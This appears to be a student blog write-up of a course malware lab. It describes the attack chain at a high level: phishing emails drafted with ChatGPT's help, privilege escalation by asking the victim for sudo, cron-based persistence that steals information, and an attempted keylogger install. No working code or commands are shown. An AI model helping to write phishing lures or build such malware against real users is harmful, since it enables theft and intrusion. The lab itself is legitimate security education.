Malware Lab Winter 2024

Lab focused on creating malware payloads


blog image

In this lab, we delved into how malware is able to attack our systems, and how to even develop our own, from developing phishing emails to writing scripts to execute malicious code on a system.

INITIAL FOOTHOLD

Although most forms of Malware can be easily avoided if users are cautious of their device usage, the wide variety of methods in which malware can infect a device, has allowed frequent infections of devices globally. The more common types of malware infection include phishing emails, websites offering free services, download button spam, and fake software installment.

In this lab, we created our own phishing emails to infect the unwary user. With the recent advancements in AI, we were able to utilize chatGPT to develop a basic template for such an email. Then, with some simple code, we successfully delivered the emails with HTML and python.

PRIVILEGE ESCALATION

Privilege Escalation is the process of gaining higher permissions from the user. While there are many ways to obtain this, the method we chose was to directly ask the user for permission. This was done through the use of the sudo command, which would be activated when our 'victim' would download our file to run from the previous phishing attacks.

PERSISTENCE

Persistence is the ability of malware to maintain its presence and control over a compromised system over an extended period. Persistent malware allows the attacker to continue to gather up do date information and thus the ability to sustain the attack. We implemented persistence in our malware through Cron, a time-based task scheduling system in Unix-like operating systems where users can schedule tasks to run at specific times known as “cron jobs”. We used a cron job that periodically runs a script that steals a target’s information

Types of Persistence

  • Timed: scheduled tasks
  • Hooks: restart tasks, shell profile scripts, etc
  • Integration: kernel-level modifications, binary replacement, bios firmware hijacking, AD infection etc

FINAL PAYLOAD

The final payload depends on what the attacker decides to do with the information they are able to access and gain. Different people have different motives when they attack. Some examples include selling the information, deleting or modifying the user's information and files, installing adware or malware, injecting viruses, usin ransomware, or even mining cryptocurrency.

In our case, we chose to install a keylogger onto the computer after sending the data off the machine.

github

This was the keylogger we made attempts to install onto the machine we infected. keylogger

There are also choices to brute-force test the passwords to get into the machines. password cracker

ROADBLOCKS

Graphics Servers

Certain actions like calling a web browser or downloading the keylogger seem to fail because the root user does not provide an acceptable graphics server to the programs.

Executable Bundling

pyinstaller, the program we used to turn the python script into a single executable, makes dealing with paths like the path to the python script inside the bundle more complicated to determine. We also did not have time to figure out why the executable only worked the specific location it was created in.